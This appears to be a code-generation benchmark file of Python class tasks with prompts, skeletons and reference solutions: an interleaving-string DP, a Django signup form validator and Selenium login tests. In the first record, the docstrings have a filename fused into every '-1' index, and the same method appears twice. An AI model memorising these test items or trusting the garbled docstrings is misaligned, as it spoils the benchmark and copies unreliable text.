dp[i][j - 1]\n elif s1[i - 1] == s3[i + j - 1]:\n dp[i][j] = dp[i - 1][j]\n else:\n dp[i][j] = False\n return dp[-1][-1]\n<|end_body_0|>\n\n<|body_start_1|>\n m, n, s = (len(s1), len(s2), len(s3))\n if s != m + n:\n return False\n dp = [[False] * (n + 1) for _ in range(m + 1)]\n dp[0][0] = True\n for i in range(1, n + 1):\n if s2[i - 1] == s3[i - 1]:\n dp[0][i] = dp[0][i - 1]\n for i in range(1, m + 1):\n if s1[i - 1] == s3[i - 1]:\n dp[i][0] = dp[i - 1][0]\n for i in range(1, m + 1):\n for j in range(1, n + 1):\n if s1[i - 1] == s2[j - 1] == s3[i + j - 1]:\n dp[i][j] = dp[i - 1][j] or dp[i][j - 1]\n elif s2[j - 1] == s3[i + j - 1]:\n dp[i][j] = dp[i][j - 1]\n elif s1[i - 1] == s3[i + j - 1]:\n dp[i][j] = dp[i - 1][j]\n else:\n dp[i][j] = False\n return dp[-1][-1]\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000273", "length_bytes": 3374, "license_type": "no_license", "methods": [{"docstring": "dp[i][j] 代表 前i个s1,与前j个s2,是否交错组成前i+j个s3 dp[0][0] = True dp[0][j] dp[j][0] dp[i][j] = dp[i-1_最短回文串.py][j] if s1[i-1_最短回文串.py] == s3[i+j-1_最短回文串.py] = dp[i][j-1_最短回文串.py] if s2[j-1_最短回文串.py] == s3[i+j-1_最短回文串.py] = dp[i-1_最短回文串.py][j] or dp[i][j-1_最短回文串.py] if s2[j-1_最短回文串.py] == s1[i-1_最短回文串.py] == s3[i+j-1_最短回文串.py] res = dp[-1_最短回文串.py][-1_最短回文串.py]", "name": "isInterleave", "signature": "def isInterleave(self, s1: str, s2: str, s3: str) -> bool"}, {"docstring": "dp[i][j] 代表 前i个s1,与前j个s2,是否交错组成前i+j个s3 dp[0][0] = True dp[0][j] dp[j][0] dp[i][j] = dp[i-1_最短回文串.py][j] if s1[i-1_最短回文串.py] == s3[i+j-1_最短回文串.py] = dp[i][j-1_最短回文串.py] if s2[j-1_最短回文串.py] == s3[i+j-1_最短回文串.py] = dp[i-1_最短回文串.py][j] or dp[i][j-1_最短回文串.py] if s2[j-1_最短回文串.py] == s1[i-1_最短回文串.py] == s3[i+j-1_最短回文串.py] res = dp[-1_最短回文串.py][-1_最短回文串.py]", "name": "isInterleave", "signature": "def isInterleave(self, s1: str, s2: str, s3: str) -> bool"}], "n_methods": 2, "original_id": 
"stack_v2_sparse_classes_30k_train_003533", "prompt": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def isInterleave(self, s1: str, s2: str, s3: str) -> bool: dp[i][j] 代表 前i个s1,与前j个s2,是否交错组成前i+j个s3 dp[0][0] = True dp[0][j] dp[j][0] dp[i][j] = dp[i-1_最短回文串.py][j] if s1[i-1_最短回文串.py] == s3[i+j-1_最短回文串.py] = dp[i][j-1_最短回文串.py] if s2[j-1_最短回文串.py] == s3[i+j-1_最短回文串.py] = dp[i-1_最短回文串.py][j] or dp[i][j-1_最短回文串.py] if s2[j-1_最短回文串.py] == s1[i-1_最短回文串.py] == s3[i+j-1_最短回文串.py] res = dp[-1_最短回文串.py][-1_最短回文串.py]\n- def isInterleave(self, s1: str, s2: str, s3: str) -> bool: dp[i][j] 代表 前i个s1,与前j个s2,是否交错组成前i+j个s3 dp[0][0] = True dp[0][j] dp[j][0] dp[i][j] = dp[i-1_最短回文串.py][j] if s1[i-1_最短回文串.py] == s3[i+j-1_最短回文串.py] = dp[i][j-1_最短回文串.py] if s2[j-1_最短回文串.py] == s3[i+j-1_最短回文串.py] = dp[i-1_最短回文串.py][j] or dp[i][j-1_最短回文串.py] if s2[j-1_最短回文串.py] == s1[i-1_最短回文串.py] == s3[i+j-1_最短回文串.py] res = dp[-1_最短回文串.py][-1_最短回文串.py]", "prompted_full_text": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def isInterleave(self, s1: str, s2: str, s3: str) -> bool: dp[i][j] 代表 前i个s1,与前j个s2,是否交错组成前i+j个s3 dp[0][0] = True dp[0][j] dp[j][0] dp[i][j] = dp[i-1_最短回文串.py][j] if s1[i-1_最短回文串.py] == s3[i+j-1_最短回文串.py] = dp[i][j-1_最短回文串.py] if s2[j-1_最短回文串.py] == s3[i+j-1_最短回文串.py] = dp[i-1_最短回文串.py][j] or dp[i][j-1_最短回文串.py] if s2[j-1_最短回文串.py] == s1[i-1_最短回文串.py] == s3[i+j-1_最短回文串.py] res = dp[-1_最短回文串.py][-1_最短回文串.py]\n- def isInterleave(self, s1: str, s2: str, s3: str) -> bool: dp[i][j] 代表 前i个s1,与前j个s2,是否交错组成前i+j个s3 dp[0][0] = True dp[0][j] dp[j][0] dp[i][j] = dp[i-1_最短回文串.py][j] if s1[i-1_最短回文串.py] == s3[i+j-1_最短回文串.py] = dp[i][j-1_最短回文串.py] if s2[j-1_最短回文串.py] == s3[i+j-1_最短回文串.py] = dp[i-1_最短回文串.py][j] or dp[i][j-1_最短回文串.py] if s2[j-1_最短回文串.py] == s1[i-1_最短回文串.py] == s3[i+j-1_最短回文串.py] res = dp[-1_最短回文串.py][-1_最短回文串.py]\n\n<|skeleton|>\nclass Solution:\n\n def isInterleave(self, s1: str, s2: str, s3: str) -> bool:\n \"\"\"dp[i][j] 代表 前i个s1,与前j个s2,是否交错组成前i+j个s3 dp[0][0] = True dp[0][j] dp[j][0] dp[i][j] = dp[i-1_最短回文串.py][j] if s1[i-1_最短回文串.py] == s3[i+j-1_最短回文串.py] = dp[i][j-1_最短回文串.py] if s2[j-1_最短回文串.py] == s3[i+j-1_最短回文串.py] = dp[i-1_最短回文串.py][j] or dp[i][j-1_最短回文串.py] if s2[j-1_最短回文串.py] == s1[i-1_最短回文串.py] == s3[i+j-1_最短回文串.py] res = dp[-1_最短回文串.py][-1_最短回文串.py]\"\"\"\n <|body_0|>\n\n def isInterleave(self, s1: str, s2: str, s3: str) -> bool:\n \"\"\"dp[i][j] 代表 前i个s1,与前j个s2,是否交错组成前i+j个s3 dp[0][0] = True dp[0][j] dp[j][0] dp[i][j] = dp[i-1_最短回文串.py][j] if s1[i-1_最短回文串.py] == s3[i+j-1_最短回文串.py] = dp[i][j-1_最短回文串.py] if s2[j-1_最短回文串.py] == s3[i+j-1_最短回文串.py] = dp[i-1_最短回文串.py][j] or dp[i][j-1_最短回文串.py] if s2[j-1_最短回文串.py] == s1[i-1_最短回文串.py] == s3[i+j-1_最短回文串.py] res = dp[-1_最短回文串.py][-1_最短回文串.py]\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n m, n, s = (len(s1), len(s2), len(s3))\n if s != m + n:\n return False\n dp = [[False] * (n + 1) for _ in range(m + 1)]\n dp[0][0] = True\n for i in range(1, n + 1):\n if s2[i - 1] == s3[i - 1]:\n dp[0][i] = dp[0][i - 1]\n for i in range(1, m + 1):\n if s1[i - 1] == s3[i - 1]:\n dp[i][0] = dp[i - 1][0]\n for i in range(1, m + 1):\n for j in range(1, n + 1):\n if s1[i - 1] == s2[j - 1] == s3[i + j - 1]:\n dp[i][j] = dp[i - 1][j] or dp[i][j - 1]\n elif s2[j - 1] == s3[i + j - 1]:\n dp[i][j] = dp[i][j - 1]\n elif s1[i - 1] == s3[i + j - 1]:\n dp[i][j] = dp[i - 
1][j]\n else:\n dp[i][j] = False\n return dp[-1][-1]\n<|end_body_0|>\n\n<|body_start_1|>\n m, n, s = (len(s1), len(s2), len(s3))\n if s != m + n:\n return False\n dp = [[False] * (n + 1) for _ in range(m + 1)]\n dp[0][0] = True\n for i in range(1, n + 1):\n if s2[i - 1] == s3[i - 1]:\n dp[0][i] = dp[0][i - 1]\n for i in range(1, m + 1):\n if s1[i - 1] == s3[i - 1]:\n dp[i][0] = dp[i - 1][0]\n for i in range(1, m + 1):\n for j in range(1, n + 1):\n if s1[i - 1] == s2[j - 1] == s3[i + j - 1]:\n dp[i][j] = dp[i - 1][j] or dp[i][j - 1]\n elif s2[j - 1] == s3[i + j - 1]:\n dp[i][j] = dp[i][j - 1]\n elif s1[i - 1] == s3[i + j - 1]:\n dp[i][j] = dp[i - 1][j]\n else:\n dp[i][j] = False\n return dp[-1][-1]\n<|end_body_1|>\n", "revision_id": "57f303aa6e76f7c5292fa60bffdfddcb4ff9ddfb", "skeleton": "<|skeleton|>\nclass Solution:\n\n def isInterleave(self, s1: str, s2: str, s3: str) -> bool:\n \"\"\"dp[i][j] 代表 前i个s1,与前j个s2,是否交错组成前i+j个s3 dp[0][0] = True dp[0][j] dp[j][0] dp[i][j] = dp[i-1_最短回文串.py][j] if s1[i-1_最短回文串.py] == s3[i+j-1_最短回文串.py] = dp[i][j-1_最短回文串.py] if s2[j-1_最短回文串.py] == s3[i+j-1_最短回文串.py] = dp[i-1_最短回文串.py][j] or dp[i][j-1_最短回文串.py] if s2[j-1_最短回文串.py] == s1[i-1_最短回文串.py] == s3[i+j-1_最短回文串.py] res = dp[-1_最短回文串.py][-1_最短回文串.py]\"\"\"\n <|body_0|>\n\n def isInterleave(self, s1: str, s2: str, s3: str) -> bool:\n \"\"\"dp[i][j] 代表 前i个s1,与前j个s2,是否交错组成前i+j个s3 dp[0][0] = True dp[0][j] dp[j][0] dp[i][j] = dp[i-1_最短回文串.py][j] if s1[i-1_最短回文串.py] == s3[i+j-1_最短回文串.py] = dp[i][j-1_最短回文串.py] if s2[j-1_最短回文串.py] == s3[i+j-1_最短回文串.py] = dp[i-1_最短回文串.py][j] or dp[i][j-1_最短回文串.py] if s2[j-1_最短回文串.py] == s1[i-1_最短回文串.py] == s3[i+j-1_最短回文串.py] res = dp[-1_最短回文串.py][-1_最短回文串.py]\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Solution:\n def isInterleave(self, s1: str, s2: str, s3: str) -> bool:\n \"\"\"dp[i][j] 代表 前i个s1,与前j个s2,是否交错组成前i+j个s3 dp[0][0] = True dp[0][j] dp[j][0] dp[i][j] = dp[i-1_最短回文串.py][j] if s1[i-1_最短回文串.py] == s3[i+j-1_最短回文串.py] = dp[i][j-1_最短回文串.py] if s2[j-1_最短回文串.py] == s3[i+j-1_最短回文串.py] = dp[i-1_最短回文串.py][j] or dp[i][j-1_最短回文串.py] if s2[j-1_最短回文串.py] == s1[i-1_最短回文串.py] == s3[i+j-1_最短回文串.py] res = dp[-1_最短回文串.py][-1_最短回文串.py]\"\"\"\n m, n, s = (len(s1), len(s2), len(s3))\n if s != m + n:\n return False\n dp = [[False] * (n + 1) for _ in range(m + 1)]\n dp[0][0] = True\n for i in range(1, n + 1):\n if s2[i - 1] == s3[i - 1]:\n dp[0][i] = dp[0][i - 1]\n for i in range(1, m + 1):\n if s1[i - 1] == s3[i - 1]:\n dp[i][0] = dp[i - 1][0]\n for i in range(1, m + 1):\n for j in range(1, n + 1):\n if s1[i - 1] == s2[j - 1] == s3[i + j - 1]:\n dp[i][j] = dp[i - 1][j] or dp[i][j - 1]\n elif s2[j - 1] == s3[i + j - 1]:\n dp[i][j] = dp[i][j - 1]\n elif s1[i - 1] == s3[i + j - 1]:\n dp[i][j] = dp[i - 1][j]\n else:\n dp[i][j] = False\n return dp[-1][-1]\n\n def isInterleave(self, s1: str, s2: str, s3: str) -> bool:\n \"\"\"dp[i][j] 代表 前i个s1,与前j个s2,是否交错组成前i+j个s3 dp[0][0] = True dp[0][j] dp[j][0] dp[i][j] = dp[i-1_最短回文串.py][j] if s1[i-1_最短回文串.py] == s3[i+j-1_最短回文串.py] = dp[i][j-1_最短回文串.py] if s2[j-1_最短回文串.py] == s3[i+j-1_最短回文串.py] = dp[i-1_最短回文串.py][j] or dp[i][j-1_最短回文串.py] if s2[j-1_最短回文串.py] == s1[i-1_最短回文串.py] == s3[i+j-1_最短回文串.py] res = dp[-1_最短回文串.py][-1_最短回文串.py]\"\"\"\n m, n, s = (len(s1), len(s2), len(s3))\n if s != m + n:\n return False\n dp = [[False] * (n + 1) for _ in range(m + 1)]\n dp[0][0] = True\n for i in range(1, n + 1):\n if s2[i - 1] == s3[i - 1]:\n dp[0][i] = 
dp[0][i - 1]\n for i in range(1, m + 1):\n if s1[i - 1] == s3[i - 1]:\n dp[i][0] = dp[i - 1][0]\n for i in range(1, m + 1):\n for j in range(1, n + 1):\n if s1[i - 1] == s2[j - 1] == s3[i + j - 1]:\n dp[i][j] = dp[i - 1][j] or dp[i][j - 1]\n elif s2[j - 1] == s3[i + j - 1]:\n dp[i][j] = dp[i][j - 1]\n elif s1[i - 1] == s3[i + j - 1]:\n dp[i][j] = dp[i - 1][j]\n else:\n dp[i][j] = False\n return dp[-1][-1]\n", "source": "the_stack_v2_python_sparse", "source_path": "4_LEETCODE/2_DP/字符串匹配问题/97_交错字符串.py", "source_repo": "fzingithub/SwordRefers2Offer", "split": "test", "star_events_count": 1} {"blob_id": "a7c17eea41f1bca733144fb1fdbda5d7e988de33", "bodies": ["full_name = self.cleaned_data.get('full_name')\nforbidden_users = ['admin', 'user', 'login', 'authenticate', 'css', 'js', 'logout', 'adminstrator', 'root', 'email', 'join', 'sql', 'static', 'python', 'delete']\nif full_name.lower() in forbidden_users:\n raise forms.ValidationError('This is a reserved word.', code='reserved word')\nif '@' in full_name or '-' in full_name or '+' in full_name or ('=' in full_name):\n raise forms.ValidationError('This is an Invalid Name, Do not use these chars: @ , - , + , =', code='invalid')\nreturn full_name", "email1 = self.cleaned_data.get('email')\nemail2 = self.cleaned_data.get('email2')\nif email1 != email2:\n raise forms.ValidationError('The two email fields didn’t match.', code=\"emails don't match\")\nif User.objects.filter(email__iexact=email2).exists():\n raise forms.ValidationError('An account with this Email already exists.', code='email exists')\nreturn email2"], "bodies_text": "<|body_start_0|>\n full_name = self.cleaned_data.get('full_name')\n forbidden_users = ['admin', 'user', 'login', 'authenticate', 'css', 'js', 'logout', 'adminstrator', 'root', 'email', 'join', 'sql', 'static', 'python', 'delete']\n if full_name.lower() in forbidden_users:\n raise forms.ValidationError('This is a reserved word.', code='reserved word')\n if '@' in full_name or '-' in full_name or '+' in full_name or ('=' in full_name):\n raise forms.ValidationError('This is an Invalid Name, Do not use these chars: @ , - , + , =', code='invalid')\n return full_name\n<|end_body_0|>\n\n<|body_start_1|>\n email1 = self.cleaned_data.get('email')\n email2 = self.cleaned_data.get('email2')\n if email1 != email2:\n raise forms.ValidationError('The two email fields didn’t match.', code=\"emails don't match\")\n if User.objects.filter(email__iexact=email2).exists():\n raise forms.ValidationError('An account with this Email already exists.', code='email exists')\n return email2\n<|end_body_1|>\n", "class_docstring": "User creation form class.", "class_name": "UserRegisterForm", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass UserRegisterForm:\n \"\"\"User creation form class.\"\"\"\n\n def clean_full_name(self):\n \"\"\"Validate fullname.\"\"\"\n <|body_0|>\n\n def clean_email2(self):\n \"\"\"Validate email 2.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n full_name = self.cleaned_data.get('full_name')\n forbidden_users = ['admin', 'user', 'login', 'authenticate', 'css', 'js', 'logout', 'adminstrator', 'root', 'email', 'join', 'sql', 'static', 'python', 'delete']\n if full_name.lower() in forbidden_users:\n raise forms.ValidationError('This is a reserved word.', code='reserved word')\n if '@' in full_name or '-' in full_name or '+' in full_name or ('=' in full_name):\n raise forms.ValidationError('This is an Invalid Name, Do not use these chars: @ , - , + 
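In the Solution record that closes above, the docstring is mangled: the filename suffix _最短回文串.py ("shortest palindrome") is fused onto every -1 index, evidently a bad find-and-replace, and the identical method is stored twice in the same class. Read past the noise and the recurrence is dp[0][0] = True and dp[i][j] = (dp[i-1][j] and s1[i-1] == s3[i+j-1]) or (dp[i][j-1] and s2[j-1] == s3[i+j-1]). Since row i only reads row i-1, the table also fits in a single row; here is a sketch of the same DP in O(n) space instead of O(mn).

def is_interleave(s1: str, s2: str, s3: str) -> bool:
    m, n = len(s1), len(s2)
    if len(s3) != m + n:
        return False
    # dp[j]: can s1[:i] and s2[:j] interleave into s3[:i+j], for the current i.
    dp = [False] * (n + 1)
    dp[0] = True
    for j in range(1, n + 1):
        dp[j] = dp[j - 1] and s2[j - 1] == s3[j - 1]
    for i in range(1, m + 1):
        dp[0] = dp[0] and s1[i - 1] == s3[i - 1]
        for j in range(1, n + 1):
            dp[j] = (dp[j] and s1[i - 1] == s3[i + j - 1]) or \
                    (dp[j - 1] and s2[j - 1] == s3[i + j - 1])
    return dp[n]


assert is_interleave('aabcc', 'dbbca', 'aadbbcbcac') is True
assert is_interleave('aabcc', 'dbbca', 'aadbbbaccc') is False
assert is_interleave('', '', '') is True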
, =', code='invalid')\n return full_name\n<|end_body_0|>\n\n<|body_start_1|>\n email1 = self.cleaned_data.get('email')\n email2 = self.cleaned_data.get('email2')\n if email1 != email2:\n raise forms.ValidationError('The two email fields didn’t match.', code=\"emails don't match\")\n if User.objects.filter(email__iexact=email2).exists():\n raise forms.ValidationError('An account with this Email already exists.', code='email exists')\n return email2\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000274", "length_bytes": 6446, "license_type": "no_license", "methods": [{"docstring": "Validate fullname.", "name": "clean_full_name", "signature": "def clean_full_name(self)"}, {"docstring": "Validate email 2.", "name": "clean_email2", "signature": "def clean_email2(self)"}], "n_methods": 2, "prompt": "Implement the Python class `UserRegisterForm` described below.\n\nClass description:\nUser creation form class.\n\nMethod signatures and docstrings:\n- def clean_full_name(self): Validate fullname.\n- def clean_email2(self): Validate email 2.", "prompted_full_text": "Implement the Python class `UserRegisterForm` described below.\n\nClass description:\nUser creation form class.\n\nMethod signatures and docstrings:\n- def clean_full_name(self): Validate fullname.\n- def clean_email2(self): Validate email 2.\n\n<|skeleton|>\nclass UserRegisterForm:\n \"\"\"User creation form class.\"\"\"\n\n def clean_full_name(self):\n \"\"\"Validate fullname.\"\"\"\n <|body_0|>\n\n def clean_email2(self):\n \"\"\"Validate email 2.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n full_name = self.cleaned_data.get('full_name')\n forbidden_users = ['admin', 'user', 'login', 'authenticate', 'css', 'js', 'logout', 'adminstrator', 'root', 'email', 'join', 'sql', 'static', 'python', 'delete']\n if full_name.lower() in forbidden_users:\n raise forms.ValidationError('This is a reserved word.', code='reserved word')\n if '@' in full_name or '-' in full_name or '+' in full_name or ('=' in full_name):\n raise forms.ValidationError('This is an Invalid Name, Do not use these chars: @ , - , + , =', code='invalid')\n return full_name\n<|end_body_0|>\n\n<|body_start_1|>\n email1 = self.cleaned_data.get('email')\n email2 = self.cleaned_data.get('email2')\n if email1 != email2:\n raise forms.ValidationError('The two email fields didn’t match.', code=\"emails don't match\")\n if User.objects.filter(email__iexact=email2).exists():\n raise forms.ValidationError('An account with this Email already exists.', code='email exists')\n return email2\n<|end_body_1|>\n", "revision_id": "167ffd3a4183529c0cbc5db4ab232026711ea915", "skeleton": "<|skeleton|>\nclass UserRegisterForm:\n \"\"\"User creation form class.\"\"\"\n\n def clean_full_name(self):\n \"\"\"Validate fullname.\"\"\"\n <|body_0|>\n\n def clean_email2(self):\n \"\"\"Validate email 2.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class UserRegisterForm:\n \"\"\"User creation form class.\"\"\"\n\n def clean_full_name(self):\n \"\"\"Validate fullname.\"\"\"\n full_name = self.cleaned_data.get('full_name')\n forbidden_users = ['admin', 'user', 'login', 'authenticate', 'css', 'js', 'logout', 'adminstrator', 'root', 'email', 'join', 'sql', 'static', 'python', 'delete']\n if full_name.lower() in forbidden_users:\n raise forms.ValidationError('This is a reserved word.', code='reserved word')\n if '@' in full_name or '-' in full_name or '+' in full_name or 
('=' in full_name):\n raise forms.ValidationError('This is an Invalid Name, Do not use these chars: @ , - , + , =', code='invalid')\n return full_name\n\n def clean_email2(self):\n \"\"\"Validate email 2.\"\"\"\n email1 = self.cleaned_data.get('email')\n email2 = self.cleaned_data.get('email2')\n if email1 != email2:\n raise forms.ValidationError('The two email fields didn’t match.', code=\"emails don't match\")\n if User.objects.filter(email__iexact=email2).exists():\n raise forms.ValidationError('An account with this Email already exists.', code='email exists')\n return email2\n", "source": "the_stack_v2_python_sparse", "source_path": "accounts/forms.py", "source_repo": "OmarFateh/Student-Portal", "split": "test", "star_events_count": 0} {"blob_id": "5cc5eac319f75440514be1f352dcc2ca7af962de", "bodies": ["if self.staging_tests:\n test_email = 'superlists_tests@163.com'\nelse:\n test_email = 'abc@163.com'\nself.browser.get(self.live_server_url)\ninput_email = self.browser.find_element_by_name('email')\ninput_email.send_keys(test_email)\ninput_email.send_keys(Keys.ENTER)\nself.wait_for(lambda: self.assertIn('邮件发送成功', self.browser.find_element_by_id('id_messages').text))\nemail_body = self.wait_for_email(test_email)\nurl = self.get_token_url(email_body)\nself.assertIn(self.live_server_url, url)\nself.browser.get(url)\nself.wait_to_be_logged_in(email=test_email)\nself.browser.find_element_by_link_text('退出').click()\nself.wait_to_be_logged_out(email=test_email)", "discorrect_url = '{}/accounts/login?token=abc123'.format(self.live_server_url)\nself.browser.get(discorrect_url)\nself.wait_for(lambda: self.assertIn('登录失败', self.browser.find_element_by_id('id_messages').text))\nself.browser.find_element_by_name('email')", "if self.staging_tests:\n test_email = 'superlists_tests@163.com'\nelse:\n test_email = 'abc@163.com'\nself.browser.get(self.live_server_url)\ninput_email = self.browser.find_element_by_name('email')\ninput_email.send_keys(test_email)\ninput_email.send_keys(Keys.ENTER)\nself.wait_for(lambda: self.assertIn('邮件发送成功', self.browser.find_element_by_id('id_messages').text))\nemail_body = self.wait_for_email(test_email)\nurl_1 = self.get_token_url(email_body)\nself.browser.quit()\ntime.sleep(5)\nself.init_browser()\nself.browser.get(self.live_server_url)\ninput_email = self.browser.find_element_by_name('email')\ninput_email.send_keys(test_email)\ninput_email.send_keys(Keys.ENTER)\nself.wait_for(lambda: self.assertIn('邮件发送成功', self.browser.find_element_by_id('id_messages').text))\nemail_body = self.wait_for_email(test_email)\nurl_2 = self.get_token_url(email_body)\nself.assertNotEqual(url_1, url_2)\nself.browser.get(url_1)\nself.wait_for(lambda: self.assertIn('登录失败', self.browser.find_element_by_id('id_messages').text))\nself.browser.find_element_by_name('email')\nself.browser.get(url_2)\nself.wait_to_be_logged_in(email=test_email)"], "bodies_text": "<|body_start_0|>\n if self.staging_tests:\n test_email = 'superlists_tests@163.com'\n else:\n test_email = 'abc@163.com'\n self.browser.get(self.live_server_url)\n input_email = self.browser.find_element_by_name('email')\n input_email.send_keys(test_email)\n input_email.send_keys(Keys.ENTER)\n self.wait_for(lambda: self.assertIn('邮件发送成功', self.browser.find_element_by_id('id_messages').text))\n email_body = self.wait_for_email(test_email)\n url = self.get_token_url(email_body)\n self.assertIn(self.live_server_url, url)\n self.browser.get(url)\n self.wait_to_be_logged_in(email=test_email)\n self.browser.find_element_by_link_text('退出').click()\n 
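The UserRegisterForm record that closes above validates full_name with two ad-hoc checks; note that its reserved-words list keeps the source repo's 'adminstrator' misspelling, so the correctly spelled 'administrator' would actually pass. A standalone sketch of the same rules follows, with the chained `in` tests collapsed to a set intersection; a plain ValueError stands in for forms.ValidationError so it runs without Django.

FORBIDDEN_NAMES = {
    'admin', 'user', 'login', 'authenticate', 'css', 'js', 'logout',
    'adminstrator',  # misspelling kept verbatim from the record; 'administrator' slips through
    'root', 'email', 'join', 'sql', 'static', 'python', 'delete'}
FORBIDDEN_CHARS = set('@-+=')


def validate_full_name(full_name: str) -> str:
    """Mirror of the record's clean_full_name, outside Django."""
    if full_name.lower() in FORBIDDEN_NAMES:
        raise ValueError('This is a reserved word.')
    if FORBIDDEN_CHARS & set(full_name):
        raise ValueError('Invalid name, do not use: @ - + =')
    return full_name


assert validate_full_name('Omar Fateh') == 'Omar Fateh'
for bad in ('admin', 'Root', 'a+b', 'x@y'):
    try:
        validate_full_name(bad)
    except ValueError:
        pass
    else:
        raise AssertionError(bad)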
self.wait_to_be_logged_out(email=test_email)\n<|end_body_0|>\n\n<|body_start_1|>\n discorrect_url = '{}/accounts/login?token=abc123'.format(self.live_server_url)\n self.browser.get(discorrect_url)\n self.wait_for(lambda: self.assertIn('登录失败', self.browser.find_element_by_id('id_messages').text))\n self.browser.find_element_by_name('email')\n<|end_body_1|>\n\n<|body_start_2|>\n if self.staging_tests:\n test_email = 'superlists_tests@163.com'\n else:\n test_email = 'abc@163.com'\n self.browser.get(self.live_server_url)\n input_email = self.browser.find_element_by_name('email')\n input_email.send_keys(test_email)\n input_email.send_keys(Keys.ENTER)\n self.wait_for(lambda: self.assertIn('邮件发送成功', self.browser.find_element_by_id('id_messages').text))\n email_body = self.wait_for_email(test_email)\n url_1 = self.get_token_url(email_body)\n self.browser.quit()\n time.sleep(5)\n self.init_browser()\n self.browser.get(self.live_server_url)\n input_email = self.browser.find_element_by_name('email')\n input_email.send_keys(test_email)\n input_email.send_keys(Keys.ENTER)\n self.wait_for(lambda: self.assertIn('邮件发送成功', self.browser.find_element_by_id('id_messages').text))\n email_body = self.wait_for_email(test_email)\n url_2 = self.get_token_url(email_body)\n self.assertNotEqual(url_1, url_2)\n self.browser.get(url_1)\n self.wait_for(lambda: self.assertIn('登录失败', self.browser.find_element_by_id('id_messages').text))\n self.browser.find_element_by_name('email')\n self.browser.get(url_2)\n self.wait_to_be_logged_in(email=test_email)\n<|end_body_2|>\n", "class_docstring": "登录测试", "class_name": "LoginTest", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass LoginTest:\n \"\"\"登录测试\"\"\"\n\n def test_001(self):\n \"\"\"输入邮箱地址发送邮件,然后取得登录验证的链接并成功登录\"\"\"\n <|body_0|>\n\n def test_002(self):\n \"\"\"使用错误的链接无法完成登录,并得到登录失败的提示\"\"\"\n <|body_1|>\n\n def test_003(self):\n \"\"\"对同一邮箱地址发送了两次登录验证的邮件 那么,第一次得到的登录验证邮件中的链接无法完成登录 第二次得到的则可以\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if self.staging_tests:\n test_email = 'superlists_tests@163.com'\n else:\n test_email = 'abc@163.com'\n self.browser.get(self.live_server_url)\n input_email = self.browser.find_element_by_name('email')\n input_email.send_keys(test_email)\n input_email.send_keys(Keys.ENTER)\n self.wait_for(lambda: self.assertIn('邮件发送成功', self.browser.find_element_by_id('id_messages').text))\n email_body = self.wait_for_email(test_email)\n url = self.get_token_url(email_body)\n self.assertIn(self.live_server_url, url)\n self.browser.get(url)\n self.wait_to_be_logged_in(email=test_email)\n self.browser.find_element_by_link_text('退出').click()\n self.wait_to_be_logged_out(email=test_email)\n<|end_body_0|>\n\n<|body_start_1|>\n discorrect_url = '{}/accounts/login?token=abc123'.format(self.live_server_url)\n self.browser.get(discorrect_url)\n self.wait_for(lambda: self.assertIn('登录失败', self.browser.find_element_by_id('id_messages').text))\n self.browser.find_element_by_name('email')\n<|end_body_1|>\n\n<|body_start_2|>\n if self.staging_tests:\n test_email = 'superlists_tests@163.com'\n else:\n test_email = 'abc@163.com'\n self.browser.get(self.live_server_url)\n input_email = self.browser.find_element_by_name('email')\n input_email.send_keys(test_email)\n input_email.send_keys(Keys.ENTER)\n self.wait_for(lambda: self.assertIn('邮件发送成功', self.browser.find_element_by_id('id_messages').text))\n email_body = self.wait_for_email(test_email)\n url_1 = self.get_token_url(email_body)\n 
self.browser.quit()\n time.sleep(5)\n self.init_browser()\n self.browser.get(self.live_server_url)\n input_email = self.browser.find_element_by_name('email')\n input_email.send_keys(test_email)\n input_email.send_keys(Keys.ENTER)\n self.wait_for(lambda: self.assertIn('邮件发送成功', self.browser.find_element_by_id('id_messages').text))\n email_body = self.wait_for_email(test_email)\n url_2 = self.get_token_url(email_body)\n self.assertNotEqual(url_1, url_2)\n self.browser.get(url_1)\n self.wait_for(lambda: self.assertIn('登录失败', self.browser.find_element_by_id('id_messages').text))\n self.browser.find_element_by_name('email')\n self.browser.get(url_2)\n self.wait_to_be_logged_in(email=test_email)\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000275", "length_bytes": 4463, "license_type": "no_license", "methods": [{"docstring": "输入邮箱地址发送邮件,然后取得登录验证的链接并成功登录", "name": "test_001", "signature": "def test_001(self)"}, {"docstring": "使用错误的链接无法完成登录,并得到登录失败的提示", "name": "test_002", "signature": "def test_002(self)"}, {"docstring": "对同一邮箱地址发送了两次登录验证的邮件 那么,第一次得到的登录验证邮件中的链接无法完成登录 第二次得到的则可以", "name": "test_003", "signature": "def test_003(self)"}], "n_methods": 3, "original_id": "stack_v2_sparse_classes_30k_train_000311", "prompt": "Implement the Python class `LoginTest` described below.\n\nClass description:\n登录测试\n\nMethod signatures and docstrings:\n- def test_001(self): 输入邮箱地址发送邮件,然后取得登录验证的链接并成功登录\n- def test_002(self): 使用错误的链接无法完成登录,并得到登录失败的提示\n- def test_003(self): 对同一邮箱地址发送了两次登录验证的邮件 那么,第一次得到的登录验证邮件中的链接无法完成登录 第二次得到的则可以", "prompted_full_text": "Implement the Python class `LoginTest` described below.\n\nClass description:\n登录测试\n\nMethod signatures and docstrings:\n- def test_001(self): 输入邮箱地址发送邮件,然后取得登录验证的链接并成功登录\n- def test_002(self): 使用错误的链接无法完成登录,并得到登录失败的提示\n- def test_003(self): 对同一邮箱地址发送了两次登录验证的邮件 